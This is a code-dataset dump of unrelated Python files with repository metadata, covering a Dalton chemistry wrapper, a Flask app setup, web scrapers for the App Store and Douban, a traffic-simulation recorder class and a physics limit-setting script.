# -*- coding: utf-8 -*- #The MIT License (MIT) # #Copyright (c) 2014 Lukasz Mentel # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: # #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. import os from collections import Counter from subprocess import Popen, call from .calculator import Calculator, InputTemplate, parse_objective from ..basisset import get_l class Dalton(Calculator): 'Wrapper for running Dalton program' def __init__(self, name='Dalton', **kwargs): self.name = name super(Dalton, self).__init__(**kwargs) self.daltonpath = os.path.dirname(self.executable) def parse(self, fname, objective, regularexp=None): ''' Parse a value from the output file ``fname`` based on the ``objective``. If the value of the ``objective`` is ``regexp`` then the ``regularexp`` will be used to parse the file. ''' regexps = { 'hf total energy': r'^@\s+Final HF energy:\s*(\-?\d+\.\d+)', 'cisd total energy': r'\d+\s*\d+\s*(\-?\d+\.\d+).*converged', 'accomplished': r'End of Wave Function Section', } if objective == 'regexp': if regularexp is None: raise ValueError("<regularexp> needs to be specified for objective='regexp'") toparse = regularexp else: toparse = regexps.get(objective, None) if toparse is None: raise ValueError("Specified objective: '{0:s}' not supported".format(objective)) return parse_objective(fname, toparse) def run(self, fname): ''' Run a single job Args: fname : dict A dictionary with keys ``mol`` and ``dal`` and their respective file name strings as values Returns: out : str Name of the dalton output file ''' dalbase = os.path.splitext(fname['dal'])[0] molbase = os.path.splitext(fname['mol'])[0] command = [self.executable] + self.runopts + [dalbase, molbase] call(command) return dalbase + '_' + molbase + '.out' def run_multiple(self, fnames): ''' Spawn two single jobs as paralell processes ''' procs = [] outputs = [] for fname in fnames: dalbase = os.path.splitext(fname['dal'])[0] molbase = os.path.splitext(fname['mol'])[0] outputs.append(dalbase + '_' + molbase + '.out') command = [self.executable] + self.runopts + [dalbase, molbase] process = Popen(command) procs.append(process) for proc in procs: proc.wait() return outputs def write_input(self, fname, template, basis, mol, core): ''' Write dalton input files: ``fname.dal`` and ``system.mol`` Args: fname : str Name of the input file ``.dal`` template : dict Dictionary with templates for the ``dal`` and ``mol`` with those strings as keys and actual templates as values basis : dict An instance of :py:class:`BasisSet <chemtools.basisset.BasisSet>` class or a dictionary of :py:class:`BasisSet <chemtools.basisset.BasisSet>` objects with element symbols as keys mol : :py:class:`chemtools.molecule.Molecule` Molecule object with the system geometry core : str Core definition ''' # Dalton uses atomic units for xyz coordinats by default daltemplate = template['dal'] moltemplate = template['mol'] # loop over different elements (not atoms) atomtypes = Counter([a.symbol for a in mol.atoms]) out = '' for symbol, count in atomtypes.items(): atoms = [a for a in mol.atoms if a.symbol == symbol] atombasis = basis[symbol] atombasis.sort() # get max angular momentum + 1 and construct block string maxb = max([get_l(s) for s in atombasis.functions.keys()]) + 1 block = str(maxb) + ' 1' * maxb out += 'Atoms={0:d} Charge={1:.1f} Block={2:s}\n'.format(count, float(atoms[0].atomic_number), block) for i, atom in enumerate(atoms, start=1): out += '{0:4s} {1:15.8f} {2:15.8f} {3:15.8f}\n'.format(atom.symbol+str(i), atom.xyz[0], atom.xyz[1], atom.xyz[2]) out += atombasis.to_dalton() molsubs = {'basis' : out} moltemp = InputTemplate(moltemplate) dalsubs = {'core' : core} daltemp = InputTemplate(daltemplate) with open(fname['mol'], 'w') as fmol: fmol.write(moltemp.substitute(molsubs)) with open(fname['dal'], 'w') as fdal: fdal.write(daltemp.substitute(dalsubs)) def __repr__(self): return "\n".join(["<Dalton(", "\tname={},".format(self.name), "\tdaltonpath={},".format(self.daltonpath), "\texecutable={},".format(self.executable), "\tscratch={},".format(self.scratch), "\trunopts={},".format(str(self.runopts)), ")>\n"])
[ "lmmentel@gmail.com" ]
lmmentel@gmail.com
9a0a73a49aa62ab13967f5685b520d1fdb27dd8c
50bc7a7bc9fc742e1d5a992c785b45c9129172ee
/app/__init__.py
02b0e68b481784669fa7d7892f5de93758728073
[]
no_license
spark0119/silvi
8bc1da68dcb18bd4907954ea02a16c840a149d16
57397bbb5232fb07e50ba74a5df7debd922d347d
refs/heads/master
2022-12-10T13:59:56.832818
2019-11-20T14:31:28
2019-11-20T14:31:28
212,820,403
0
1
null
2022-12-08T06:54:47
2019-10-04T13:24:06
Python
UTF-8
Python
false
false
1,597
py
from flask import Flask from config import Config from flask_sqlalchemy import SQLAlchemy from flask_migrate import Migrate from flask_login import LoginManager import logging from logging.handlers import SMTPHandler, RotatingFileHandler import os app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) migrate = Migrate(app, db) login = LoginManager(app) login.login_view = 'login' from app import routes, models, errors if not app.debug: if app.config['MAIL_SERVER']: auth = None if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']: auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']) secure = None if app.config['MAIL_USE_TLS']: secure = () mail_handler = SMTPHandler( mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']), fromaddr='no-reply@' + app.config['MAIL_SERVER'], toaddrs=app.config['ADMINS'], subject='Silvi Failure', credentials=auth, secure=secure) mail_handler.setLevel(logging.ERROR) app.logger.addHandler(mail_handler) if not os.path.exists('logs'): os.mkdir('logs') file_handler = RotatingFileHandler('logs/silvi.log', maxBytes=10240, backupCount=10) file_handler.setFormatter(logging.Formatter( '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) app.logger.setLevel(logging.INFO) app.logger.info('Silvi startup')
[ "sean@groupraise.com" ]
sean@groupraise.com
2504fde740ea6ec4311efc8b5ea73256cae6680b
0961b605531fa73cb88640b5978572217bdb6554
/combinationSum.py
178da555738c081ee937891c539841ec56526b69
[]
no_license
LYoung-Hub/Algorithm-Data-Structure
e01d8b72c4026d9d4b9788016ca54c4e359e80ba
e42ec45d98f990d446bbf4f1a568b70855af5380
refs/heads/master
2020-07-13T17:17:42.897244
2019-11-11T06:15:59
2019-11-11T06:15:59
205,121,630
0
0
null
null
null
null
UTF-8
Python
false
false
786
py
class Solution(object): ans = [] def combinationSum(self, candidates, target): """ :type candidates: List[int] :type target: int :rtype: List[List[int]] """ length = len(candidates) if length == 0: return [] self.ans = [] comb = [] self.backTracking(candidates, target, comb) return self.ans def backTracking(self, nums, target, comb): if target == 0: self.ans.append(comb) return if target < 0: return for i in range(0, len(nums)): self.backTracking(nums[i:], target - nums[i], comb + [nums[i]]) if __name__ == '__main__': solu = Solution() print solu.combinationSum([2, 3, 6, 7], 7)
[ "yangliu2@caltech.edu" ]
yangliu2@caltech.edu
e3ba9166ff9f094c8ede9e3c3756bb8117241c50
3cae667175b2d6aac6d7f3d8189e9a02c38ea1cf
/AOJ/ITP1/python/ITP1_1_D_Watch.py
c0a07556a3ffec6f81a94127a026e1a802c5a520
[]
no_license
kokorinosoba/contests
3ee14acf729eda872ebec9ec7fe3431f50ae23c2
6e0dcd7c8ee086650d89fc65616981361b9b20b9
refs/heads/master
2022-08-04T13:45:29.722075
2022-07-24T08:50:11
2022-07-24T08:50:11
149,092,111
0
0
null
null
null
null
UTF-8
Python
false
false
130
py
s=int(input()) print(s//3600,s//60%60,s%60,sep=':') """ S=int(input()) m,s=divmod(S,60) h,m=divmod(m,60) print(h,m,s,sep=":") """
[ "34607448+kokorinosoba@users.noreply.github.com" ]
34607448+kokorinosoba@users.noreply.github.com
092ad3e710de8763f9af7ca100f888acc1cc9d24
5303252c8d570844d71fe374d6c78eb6f14aebb6
/iosgames/spiders/iosgamesbot.py
48d4b32f85b44053b2b71c180e4a2ac2db15c308
[]
no_license
vin-say/web-scraping
7cff35f73980cbce49a5b5d70cb35b04b350c333
be3b529d485e1330a8189692f1bf9720ff23b4ec
refs/heads/master
2020-08-04T15:39:13.923213
2020-01-04T03:40:26
2020-01-04T03:40:26
212,187,615
0
0
null
null
null
null
UTF-8
Python
false
false
2,707
py
# -*- coding: utf-8 -*- import scrapy from ..items import GameItemLoader, Game class Iosgamesbot(scrapy.Spider): name = 'iosgamesbot' allowed_domains = ['apps.apple.com/us/app/simcity-buildit/id913292932'] start_urls = ['http://apps.apple.com/us/app/simcity-buildit/id913292932/'] def parse(self, response): il = GameItemLoader(item=Game(), response=response) # basic information il.add_xpath('title', '//h1[@class="product-header__title app-header__title"]/text()') il.add_xpath('subtitle', '//h2[@class="product-header__subtitle app-header__subtitle"]/text()') il.add_xpath('author', '//h2[@class="product-header__identity app-header__identity"]/a/text()') il.add_xpath('price', '//li[@class="inline-list__item inline-list__item--bulleted app-header__list__item--price"]/text()') il.add_xpath('iap', '//li[@class="inline-list__item inline-list__item--bulleted app-header__list__item--in-app-purchase"]/text()') il.add_xpath('age', '//span[@class="badge badge--product-title"]/text()') il.add_xpath('desc', '//div[@class="section__description"]//p/text()') # game popularity and reception il.add_xpath('list_rank', '//li[@class="inline-list__item"]/text()') il.add_xpath('score', '//span[@class="we-customer-ratings__averages__display"]/text()') il.add_xpath('nrating', '//div[@class="we-customer-ratings__count small-hide medium-show"]/text()') il.add_xpath('stars', '//div[@class="we-star-bar-graph__row"]/div/div/@style') # other details il.add_xpath('editor', '//div[@class="we-editor-notes lockup ember-view"]/div/h3/text()') il.add_xpath('seller', '//dl[@class="information-list information-list--app medium-columns"]/div[1]/dd[@class="information-list__item__definition l-column medium-9 large-6"]/text()') il.add_xpath('size', '//dl[@class="information-list information-list--app medium-columns"]/div[2]/dd[@class="information-list__item__definition l-column medium-9 large-6"]/text()') il.add_xpath('category', '//dl[@class="information-list information-list--app medium-columns"]/div[3]/dd/a/text()') il.add_xpath('compat', '//dl[@class="information-list information-list--app medium-columns"]//p/text()') il.add_xpath('lang', '//dl[@class="information-list information-list--app medium-columns"]//p/text()') il.add_xpath('age_copy', '//dl[@class="information-list information-list--app medium-columns"]/div//dd/text()') il.add_xpath('support', '//div[@class="supports-list__item__copy"]/h3[@dir="ltr"]/text()') return il.load_item()
[ "vincent.sayseng@gmail.com" ]
vincent.sayseng@gmail.com
a78e5ff716f3fa6d77eaee943d3c3d68e344c53d
3b6bf30cd6ef7f770faa84852515af3255e217af
/douban_spider/douban/spiders/doubancomics.py
fc1a15fc2e58abb8096312ed464f891339bdef4e
[]
no_license
lemonround1995/Douban_Spider
ae8e6a9f5e907e0bcbfc026e5f0acfe1325647eb
162adc5af31e425a3dd091fb255b758c63c62cb1
refs/heads/master
2020-04-13T01:07:07.304265
2018-12-23T05:35:46
2018-12-23T05:35:46
162,864,760
0
0
null
null
null
null
UTF-8
Python
false
false
1,274
py
# -*- coding: utf-8 -*- import scrapy from scrapy.http import Request from ..items import DoubanItem class DoubancomicsSpider(scrapy.Spider): name = "doubancomics" allowed_domains = ["douban.com"] start_urls = ['https://book.douban.com/tag/%E6%BC%AB%E7%94%BB?start=0&type=T'] def parse(self, response): for sel in response.xpath('//*[@id="subject_list"]/ul/li/div[2]'): item = DoubanItem() item['title'] = sel.xpath('h2/a/text()').extract_first() item['link'] = sel.xpath('h2/a/@href').extract_first() item['info'] = sel.xpath('div[1]/text()').extract_first() item['desc'] = sel.xpath('p/text()').extract_first() yield item # 爬行多页 next_page_1 = response.xpath('//*[@id="subject_list"]/div[2]/span[4]/a/@href').extract_first() # 因为“后页”的格式有变 next_page_2 = response.xpath('//*[@id="subject_list"]/div[2]/span[5]/a/@href').extract_first() if next_page_1: url = u'https://book.douban.com' + next_page_1 yield Request(url, callback=self.parse) if next_page_2: url = u'https://book.douban.com' + next_page_2 yield Request(url, callback=self.parse)
[ "noreply@github.com" ]
noreply@github.com
c1abf839a8e2b0961c4bf36e6da588e937b240ab
f9ef267bf703783d95b188ff29fd2a5fc686c926
/Basik_Tutorial/__basik__/record.py
06b3d1314b26cabd76d0744d56548b70745bfe63
[]
no_license
dylansolms/TrafficSimulator
34e2643ac74a235278c7aec1103fe0c3c46b0a08
6ef19e76aad6ff4470d864db9b35c734ded36660
refs/heads/master
2022-11-26T15:45:13.832385
2020-07-17T12:54:03
2020-07-17T12:54:03
280,400,653
0
0
null
null
null
null
UTF-8
Python
false
false
15,549
py
import numpy as np import pandas as pd import matplotlib.pyplot as plt from .node import Node from .source import Source from .VehicleObject.vehicle import Vehicle import warnings from .utils import unique_legend try: import cPickle as pickle except ImportError or ModuleNotFoundError: import pickle #------------------------------------------------------------------------------ class Record(object): '''Records the time-stamps of vehicle arrival times. Attributes ----------- time_stamps: list A list of the times that vehicles passed the node with a Record object. source_IDs: list Each source that generates vehicle arrivals has an ID. This way we can determine which source a recorded vehicle may have come from. colors: list Just as each source has an ID associated with it, so does it have a unique color as well. This helps with the stem_plot method. data: Pandas DataFrame If we are recording either time-stamps or inter-arrival times to a csv file then we produces this DataFrame as to make use of the Pandas.DataFrame.to_csv method. current_time: float The last time the record object was activate i.e. it recorded a vehicle. vehicles: list A list of the actual vehicles that passed will be kept in addition to the time-stamps. This means that the vehicles can be probed for additional information. ''' is_record = True RECORD = True color_list = ['royalblue','orchid','coral','cyan','palegreen','firebrick', 'orange','olive','thistle','grey','tomato','teal','maroon', 'plum','wheat','turquoise'] #-------------------------------------------------------------------------- def __init__(self,node:'__basik__.node.Node',axes=None): ''' Parameters ---------- node: __basik__.node.Node This is the node that will record vehicles. axes: matplotlib.axes._subplots.AxesSubplot The stem_plot method makes use of this. If is left as None, then a new axes object will be produced. This object can be accessed as a class attribute. Raises: ------- AssertionError If the node parameter is not an instance of __basik__.node.Node ''' assert isinstance(node,Node) self.time_stamps = [] self.source_IDs = [] self.colors = [] self.data = None self.axes = axes self.vehicles = [] self.__setup(node) self.current_time = 0 #-------------------------------------------------------------------------- def place_record(self,vehicle): '''Record the actual vehicle. The vehicle object will be appended to the vehicles list, its arrival time will be appended to the time_stamps and its source ID and color will be recorded as well. The current_time of the record object will be updated to match that of the current vehicle being recorded. Parameters: ----------- vehicle: __basik__.VehicleObject.vehicle.Vehicle A vehicle being recorded. Raises: ------- AssertionError If the node parameter is not an instance of __basik__.VehicleObject.vehicle.Vehicle Returns: ------- None ''' assert isinstance(vehicle,Vehicle) self.vehicles.append(vehicle) self.current_time = vehicle.time self.time_stamps.append(vehicle.time) self.source_IDs.append(vehicle.source_ID) self.colors.append(self.color_list[vehicle.source_ID]) return None #-------------------------------------------------------------------------- def process_records(self,start_time:'float or None'=None): '''Processes time-stamp into intervals. Parameters: ----------- start_time: None or float or int If set to None then the first recorded time-stamp will serve as as the starting point for producing intervals/vehicle inter-arrival times. Hence N time-stamps give rise to (N-1) intervals. If star_time is provided then N intervals are produced. Raises: ------- AssertionError: If start_time is not None then it must be smnaller than the first recorded time-stamp. Returns: ------- None ''' if not bool(self.vehicles): raise Exception('No vehicles were recorded.') # for vehicle in self.vehicles: # self.place_record(vehicle) if start_time is None: x = np.array(self.time_stamps) else: assert start_time < self.time_stamps[0] x = np.array([start_time] + self.time_stamps) self.intervals = x[1:] - x[:-1] return None #-------------------------------------------------------------------------- def clear(self,current_time:float=0): '''Clears all recordings and resets current_time. Parameters: ----------- current_time: float or int Returns: ------- None ''' self.time_stamps = [] self.source_IDs = [] self.colors = [] self.current_time = current_time self.vehicles = [] self.intervals = None self.node.record_object = self self.node.record = True if self.axes is not None: self.axes.cla() return None #-------------------------------------------------------------------------- def __setup(self,node): node.record_object = self node.record = True if node.display_axes is not None: node.icon_image = Node.camera node.display_icon() self.node = node return None #-------------------------------------------------------------------------- def _read(self,file_name): self.data = pd.read_csv(file_name) return None #-------------------------------------------------------------------------- def _write(self,file_name,intervals=True): if intervals: x = np.array([0] + self.time_stamps) x = x[1:] - x[:-1] self.data = pd.DataFrame(data=x, columns=['intervals']) else: self.data = pd.DataFrame(data=self.time_stamps, columns=['time-stamps']) if file_name[-4:] != '.csv': file_name += '.csv' warnings.warn('.csv extension was added.') self.data.to_csv(file_name,index=False) return None #-------------------------------------------------------------------------- def _save_as_csv(self,file_name,intervals=True): self._write(file_name,intervals) return None #-------------------------------------------------------------------------- def _save_as_pickle(self,file_name:'name.pkl'): if file_name[-4:] != '.pkl': file_name += '.pkl' warnings.warn('.pkl extentsion was added.') with open(file_name,'wb') as file: pickle.dump(self, # it pickles the actual Source class instance. file, protocol=4) # allows for large data. return None #-------------------------------------------------------------------------- def save(self,file_name:str, method:'\'csv\', \'pickle\' or \'pkl\''='csv', intervals:bool=True, start_time:'float or None'=None): '''Saves recorded information to a file of choice. Parameters: ----------- file_name: str This should be a valid path name. method: 'csv', 'pickle' or 'pkl' If the csv method is chosen then only the time-stamps or intervals/ vehicle inter-arrival times will be recorded. Choose interval as True if vehicle inter-arrival times are required. If the pickle method is chosen then the enitre object with all its data will be serialised. intervals: bool If set to True then inter-arrival times will saved as a csv with the header 'intervals'. Otherwise, time-stamps are saved under the header 'time-stamps'. start_time: None or float or int If set to None then the first recorded time-stamp will serve as as the starting point for producing intervals/vehicle inter-arrival times. Hence N time-stamps give rise to (N-1) intervals. If star_time is provided then N intervals are produced. Raises: ------- ValueError If an invalid method is given. See method under Parameters. Notes: ------ If a valid method is chosen but the file_name does not contain the correct extension then the extension will be added. A warning will be produced via the warnings module to notify the user that this has been performed. Returns: -------- None ''' # Intervals = True is only applicable to the csv file if method == 'csv': self._save_as_csv(file_name,intervals) elif method == 'pickle' or method == 'pkl': self._save_as_pickle(file_name) else: raise ValueError('method must be either \'csv\', \'pickle\' or \'pkl\' ') return None #-------------------------------------------------------------------------- def to_source(self,vehicle_velocity:'float m/s', target_node:'__basik__.node.Node', vehicle_color:str='random', record_movement:bool=False): '''Converts a __basik__.source.Record object to a __basik__.source.Source object. The record object and all its recorded time-stamps are converted to a source object. This means that one can convert a recorded section of a simulation and use it as a source in a separate simulation. Hence, a larger simualtion can be broken down into smaller ones. Note: this method does not save the new source object. A pickled (serialised) record object can always be converted to a source object. Parameters: ----------- vehicle_velocity: float A value in meters per second. All vehicle will move at this velocity on average. target_node: __basik__.node.Node The node at which new vehicles will arrive/appear/be introduced to interact in the simulation. vehicle_color: str This is the color setting of the vehicle. Note that if the color has been set to 'random' then the randomly selected color can be accessed via Vehicle.vehicle_display.color record_movement: bool A vehicle can be produced by the source with the setting/instructions that it record its movement across the simulation. A recorded vehicle can then be probed for this information from the vehicles list. Raises: ------- AssetionError: If the target_node is not an instance of __basik__.node.Node Returns: -------- None Notes: ------ While this method converts a record object to a source object, it does not create a saved source object. This is because any saved record object can be converted to a source object. ''' assert isinstance(target_node,Node) rate_schedule = {0:self} source = Source(vehicle_velocity=vehicle_velocity, target_node=target_node, rate_schedule=rate_schedule, vehicle_color=vehicle_color, record_movement=record_movement) # NOTE: look at source.py # one will notice that Source.schedule_arrivals() can handle # the rate_schedule given. return source #-------------------------------------------------------------------------- def stem_plot(self,start_time:'float or None'=None, legend:bool=True): '''Creates a stem-plot of the inter-arrival times (intervals). Parameters: ----------- start_time: None or float or int If set to None then the first recorded time-stamp will serve as as the starting point for producing intervals/vehicle inter-arrival times. Hence N time-stamps give rise to (N-1) intervals. If star_time is provided then N intervals are produced. legend: bool Creates a legend to indicte which source a recorded vehicle originates from. Returns: -------- None ''' if self.axes is None: self.figure,self.axes = plt.subplots(1,1) if start_time is None: X = np.array(self.time_stamps) else: X = np.array([start_time] + self.time_stamps) X = X[1:] - X[:-1] seen_ids = [] for idx,x in enumerate(X): self.axes.vlines(idx,0,x,colors=self.colors[idx], alpha=0.5,linestyle='--') source_id = self.source_IDs[idx] if source_id in seen_ids: self.axes.scatter([idx],[x],color=self.colors[idx]) else: seen_ids.append(source_id) self.axes.scatter([idx],[x],color=self.colors[idx], label='Source (ID:{0})'.format(source_id)) if legend: # self.axes.legend(loc='best') self.legend = unique_legend(axes=self.axes, loc='best') self.axes.set_xlabel('$n^{th}$ arrival') self.axes.set_ylabel('inter-arrival times') self.axes.set_title('Inter-arrival time stem plot') # if hasattr(self, 'figure'): # self.figure.show() # else: # plt.show() return None #-------------------------------------------------------------------------- def __repr__(self): return 'Record ({0}) at {1}'.format(hex(id(self)), self.node) #--------------------------------------------------------------------------
[ "afrozoolander@gmail.com" ]
afrozoolander@gmail.com
33c45d1bea515ce8e7487f1aaae7632a3290ea23
7266cf77381267869aa39b6345666d148793f153
/THETA/run_0.8tZ_0.2bW_0.0tH.py
783200ff41e1e95fad152beac8cafdd97d339b2f
[]
no_license
justinrpilot/VLQAnalysis
8a0ff20f96be58d5613dc1eec308e43d0a931f96
99d6295ef985ebdd8a66820b024750b890ab4aff
refs/heads/master
2020-05-03T06:17:42.717548
2019-06-04T20:16:16
2019-06-04T20:16:16
178,469,791
0
0
null
null
null
null
UTF-8
Python
false
false
7,000
py
import json def allhadfilter(hname): #print hname names = hname.split("__") channel = names[0] process = names[1] #if ("tprime" not in process): # return hname keep = True if (("sig800" in channel) and ("tprime800" not in process)): keep = False if (("sig1000" in channel) and ("tprime1000" not in process)): keep = False if (("sig1200" in channel) and ("tprime1200" not in process)): keep = False if (("sig1400" in channel) and ("tprime1400" not in process)): keep = False if (("sig1600" in channel) and ("tprime1600" not in process)): keep = False if (("sig1800" in channel) and ("tprime1800" not in process)): keep = False if 'diboson' in process and 'SF' in hname: keep = False #print channel, process, keep if (not keep): hname = hname.replace("__", "DONOTUSE") #print hname return hname def build_model__ttbar_allhad(allhadfile, mcstat): print "Using All-Had File: ", allhadfile mod = build_model_from_rootfile(allhadfile, root_hname_to_convention=allhadfilter, include_mc_uncertainties=True) mod.fill_histogram_zerobins() mod.set_signal_processes("tprime*") sf_t = 0.02 sf_W = 0.02 sf_Z = 0.02 sf_H = 0.02 sf_b = 0.02 sf_q = 0.02 for chan in mod.get_observables(): print chan for p in mod.processes: if 'qcd' in p: continue tags = 0 mod.add_lognormal_uncertainty('lumi', 0.027, p, chan) #if '1W' in chan: # tags += 1 # mod.add_lognormal_uncertainty('W_SF', sf_W, p, chan) #if '2W' in chan: # tags += 2 # mod.add_lognormal_uncertainty('W_SF', 2*sf_W, p, chan) #if '3W' in chan: # tags += 3 # mod.add_lognormal_uncertainty('W_SF', 3*sf_W, p, chan) #if '4W' in chan: # tags += 4 # mod.add_lognormal_uncertainty('W_SF', 4*sf_W, p, chan) #if '1t' in chan: # tags += 1 # mod.add_lognormal_uncertainty('t_SF', sf_t, p, chan) #if '2t' in chan: # tags += 2 # mod.add_lognormal_uncertainty('t_SF', 2*sf_t, p, chan) #if '3t' in chan: # tags += 3 # mod.add_lognormal_uncertainty('t_SF', 3*sf_t, p, chan) #if '4t' in chan: # tags += 4 # mod.add_lognormal_uncertainty('t_SF', 4*sf_t, p, chan) #if '1Z' in chan: # tags += 1 # mod.add_lognormal_uncertainty('Z_SF', sf_Z, p, chan) #if '2Z' in chan: # tags += 2 # mod.add_lognormal_uncertainty('Z_SF', 2*sf_Z, p, chan) #if '3Z' in chan: # tags += 3 # mod.add_lognormal_uncertainty('Z_SF', 3*sf_Z, p, chan) #if '4Z' in chan: # tags += 4 # mod.add_lognormal_uncertainty('Z_SF', 4*sf_Z, p, chan) #if '1H' in chan: # tags += 1 # mod.add_lognormal_uncertainty('H_SF', sf_H, p, chan) #if '2H' in chan: # tags += 2 # mod.add_lognormal_uncertainty('H_SF', 2*sf_H, p, chan) #if '3H' in chan: # tags += 3 # mod.add_lognormal_uncertainty('H_SF', 3*sf_H, p, chan) #if '4H' in chan: # tags += 4 # mod.add_lognormal_uncertainty('H_SF', 4*sf_H, p, chan) #if '1b' in chan: # tags += 1 # mod.add_lognormal_uncertainty('b_SF', sf_b, p, chan) #if '2b' in chan: # tags += 2 # mod.add_lognormal_uncertainty('b_SF', 2*sf_b, p, chan) #if '3b' in chan: # tags += 3 # mod.add_lognormal_uncertainty('b_SF', 3*sf_b, p, chan) #if '4b' in chan: # tags += 4 # mod.add_lognormal_uncertainty('b_SF', 4*sf_b, p, chan) #mod.add_lognormal_uncertainty('q_SF', (4-tags)*sf_q, p, chan) #mod.add_lognormal_uncertainty('xsec_ttbar', 0.05, 'ttbar', chan) mod.add_lognormal_uncertainty('xsec_wjets', 0.10, 'wjets', chan) mod.add_lognormal_uncertainty('xsec_zjets', 0.10, 'zjets', chan) mod.add_lognormal_uncertainty('xsec_diboson', 0.50, 'diboson', chan) mod.add_lognormal_uncertainty('xsec_ttV', 0.50, 'ttV', chan) mod.add_lognormal_uncertainty('xsec_higgs', 0.50, 'higgs', chan) return mod infile = "templates/theta4jet_0.8tz_0.2bw_0.0th.root" model = build_model__ttbar_allhad(infile, True) #model_summary(model, create_plots=True, all_nominal_templates=False, shape_templates=True) opts = Options() options = Options() options.set('minimizer', 'strategy', 'robust') options.set('minimizer', 'minuit_tolerance_factor', '10000000') #runs = bayesian_quantiles(model, input='toys:0', n=1000, run_theta=False, hint_method='zero') #runs_data = bayesian_quantiles(model, input='data', n=10, run_theta=False, hint_method='zero') # results = bayesian_limits(model, input='toys:0', n=10, run_theta = True, **args) #print results #for sig in model.signal_process_groups: # print sig, runs[sig] # run = runs[sig] # run_data = runs_data[sig] # thisOptions = Options() # run.get_configfile(thisOptions) # run_data.get_configfile(thisOptions) expected, observed = bayesian_limits(model, 'all', n_toy = 500, run_theta = True) expected.write_txt("limitsJAN_0.8tz_0.2bw_0.0th.txt") observed.write_txt("obslimitsJAN_0.8tz_0.2bw_0.0th.txt") #parameter_values_nom = {} #for p in model.get_parameters([]): # parameter_values_nom['beta_signal'] = 1.0 # parameter_values_nom[p] = 0.0 #histos = evaluate_prediction(model, parameter_values_nom, include_signal = True) #out_histos_dict = dict() #for channel in histos: # out_histos_dict[channel] = dict() # for hist in histos[channel]: # out_histos_dict[channel].update( {hist : list(histos[channel][hist].get_values())} ) #with open('histos.json', 'w') as file: # file.write(json.dumps(out_histos_dict)) #discovery(model, use_data=False, maxit=50, n = 100, n_expected = 100 ) # pVals = pvalue(model, input='toys:1.0', n = 50, options=options, bkgtoys_n = 100, bkgtoys_n_runs = 3) # print pVal # options = Options() # options.set('minimizer', 'strategy', 'robust') # options.set('minimizer', 'minuit_tolerance_factor', '10000000') # parVals = mle(model, input='toys:0', n=10, options = options) # print parVals # parameter_values = {} # parameter_values_nom = {} # for p in model.get_parameters([]): # parameter_values[p] = parVals['zpn3000'][p][0][0] # parameter_values_nom[p] = 0.0#parVals['zpn3000'][p][0][0] # histos = evaluate_prediction(model, parameter_values, include_signal = False) # write_histograms_to_rootfile(histos, 'histos-mle.root') # histos = evaluate_prediction(model, parameter_values_nom, include_signal = False) # write_histograms_to_rootfile(histos, 'histos-nom.root') # exp.write_txt("limits_combo_test.txt") # obs.write_txt("limits_obs_combo_test.txt") # o_file = open('limits.txt', 'w') # for i in range(len(exp.x)): # o_file.write( '%.2f %.5f' % (exp.x[i], exp.y[i])) # o_file.write(' %.5f %.5f' % (exp.bands[1][1][i], exp.bands[1][0][i])) # o_file.write(' %.5f %.5f' % (exp.bands[0][1][i], exp.bands[0][0][i])) # o_file.write(' %.5f' % (obs.y[i] if obs else -1.)) # o_file.write('\n') # o_file.close()
[ "pilot@Justins-MacBook-Air-4.local" ]
pilot@Justins-MacBook-Air-4.local
c4116cf331ef22b2e9039e73422782228e1bf95c
e4f2374a50cfdc674ba8e97fa6616b2fb11f40d0
/function_store.py
6284927d14856e44faba396c172a1075b3202852
[]
no_license
flying-pi/functionPatching
9eabc7613dabc8537a8bc3386750014859ac29ff
b488b9ab9f43d6a2715dd24aec652bf582f0ffd3
refs/heads/master
2021-05-15T17:01:38.550572
2017-10-19T15:59:13
2017-10-19T15:59:13
107,568,028
0
0
null
null
null
null
UTF-8
Python
false
false
86
py
from peta_module import peta_function def adder(a): return peta_function(a, 10)
[ "yura.braiko@raccoongang.com" ]
yura.braiko@raccoongang.com
55e3891a2fa5e9360b2ff65099e45176087373ca
d8ec14c780f7536a099b6c4f03461ac546d54d6c
/helga_excuses.py
6f6e408b60364668e4888aac2a13ec87064d9e81
[]
no_license
alfredodeza/helga-excuses
bdcc0621a505fc9abd2cdc79c020bd7aa694c5a9
251c155affaf7d3412a65fe1cb572e6e565d8864
refs/heads/master
2021-01-10T19:11:16.352300
2013-12-10T23:48:43
2013-12-10T23:48:43
14,873,521
1
0
null
2013-12-10T23:48:44
2013-12-02T20:15:25
Python
UTF-8
Python
false
false
416
py
import requests from BeautifulSoup import BeautifulSoup from helga.plugins import command @command('excuses', aliases=['excuse'], help='Show something from developer excuses. Usage: helga (excuses|excuse)') def excuses(client, channel, nick, message, cmd, args): response = requests.get('http://developerexcuses.com/') return BeautifulSoup(response.text).find('a').text.encode('ascii', 'ignore')
[ "shaun.duncan@gmail.com" ]
shaun.duncan@gmail.com
fcf69ccc998f4adb76624b38832b6312065d0673
d1160216bfbeb13a0f8356d5fcf70a6588be0d2b
/server.py
3b1c24fb2388ddabcc729992f682dcea6bc679ac
[]
no_license
afabijan/hypflask
e32770d036385aec096c7567a48a551e3df45354
d4a292361a98b83f78ee579a32dada34abd18dc7
refs/heads/master
2021-01-10T14:56:18.854402
2015-06-05T13:50:30
2015-06-05T13:50:30
36,935,283
0
0
null
null
null
null
UTF-8
Python
false
false
645
py
